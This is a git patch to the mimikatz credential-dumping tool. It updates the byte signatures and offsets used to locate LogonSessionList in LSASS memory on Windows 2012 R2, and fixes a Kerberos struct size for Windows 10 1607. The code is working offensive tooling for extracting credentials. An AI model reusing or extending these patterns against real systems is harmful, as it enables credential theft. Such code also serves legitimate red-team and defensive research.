From 57f410156754ebb00a788bae13087bd5f7274ad1 Mon Sep 17 00:00:00 2001 From: Benjamin DELPY Date: Wed, 5 Oct 2016 21:37:29 +0300 Subject: [PATCH] [fix #65] mimikatz sekurlsa::* for old 2012r2 version [fix #66] mimikatz sekurlsa::kerberos CSP/Pin data for Windows 10 1607 --- inc/globals.h | 2 +- mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c | 4 ++-- mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/inc/globals.h b/inc/globals.h index ac047c6..293ce5b 100644 --- a/inc/globals.h +++ b/inc/globals.h @@ -32,7 +32,7 @@ #define MIMIKATZ_VERSION L"2.1" #define MIMIKATZ_CODENAME L"A La Vie, A L\'Amour" #define MIMIKATZ_FULL MIMIKATZ L" " MIMIKATZ_VERSION L" (" MIMIKATZ_ARCH L") built on " TEXT(__DATE__) L" " TEXT(__TIME__) -#define MIMIKATZ_SECOND L"\"" MIMIKATZ_CODENAME L"\" - CQURE Edition" +#define MIMIKATZ_SECOND L"\"" MIMIKATZ_CODENAME L"\"" #define MIMIKATZ_SPECIAL L" " #define MIMIKATZ_DEFAULT_LOG MIMIKATZ L".log" #define MIMIKATZ_DRIVER L"mimidrv" diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c index 9c2a2eb..bf389bc 100644 --- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c +++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c @@ -9,7 +9,7 @@ BYTE PTRN_WIN5_LogonSessionList[] = {0x4c, 0x8b, 0xdf, 0x49, 0xc1, 0xe3, 0x04, 0x48, 0x8b, 0xcb, 0x4c, 0x03, 0xd8}; BYTE PTRN_WN60_LogonSessionList[] = {0x33, 0xff, 0x45, 0x85, 0xc0, 0x41, 0x89, 0x75, 0x00, 0x4c, 0x8b, 0xe3, 0x0f, 0x84}; BYTE PTRN_WN61_LogonSessionList[] = {0x33, 0xf6, 0x45, 0x89, 0x2f, 0x4c, 0x8b, 0xf3, 0x85, 0xff, 0x0f, 0x84}; -BYTE PTRN_WN63_LogonSessionList[] = {0x33, 0xff, 0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xfb, 0x45, 0x85, 0xc0, 0x74}; +BYTE PTRN_WN63_LogonSessionList[] = {0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0xc1, 0xe1, 0x05, 0x48, 0x8d, 0x05}; BYTE PTRN_WN6x_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74}; KULL_M_PATCH_GENERIC LsaSrvReferences[] = { {KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}}, @@ -17,7 +17,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = { {KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WN60_LogonSessionList), PTRN_WN60_LogonSessionList}, {0, NULL}, {21, -4}}, {KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_LogonSessionList), PTRN_WN61_LogonSessionList}, {0, NULL}, {19, -4}}, {KULL_M_WIN_BUILD_8, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {16, -4}}, - {KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_LogonSessionList), PTRN_WN63_LogonSessionList}, {0, NULL}, {24, -4}}, + {KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_LogonSessionList), PTRN_WN63_LogonSessionList}, {0, NULL}, {36, -6}}, {KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {16, -4}}, }; #elif defined _M_IX86 diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c index c253476..c6d88f2 100644 --- a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c +++ b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c @@ -292,7 +292,7 @@ const KERB_INFOS kerbHelper[] = { FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, Tickets_3), }, FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, SmartcardInfos), - sizeof(KIWI_KERBEROS_LOGON_SESSION_10), + sizeof(KIWI_KERBEROS_LOGON_SESSION_10_1607), FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, ServiceName), FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, TargetName), FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, DomainName),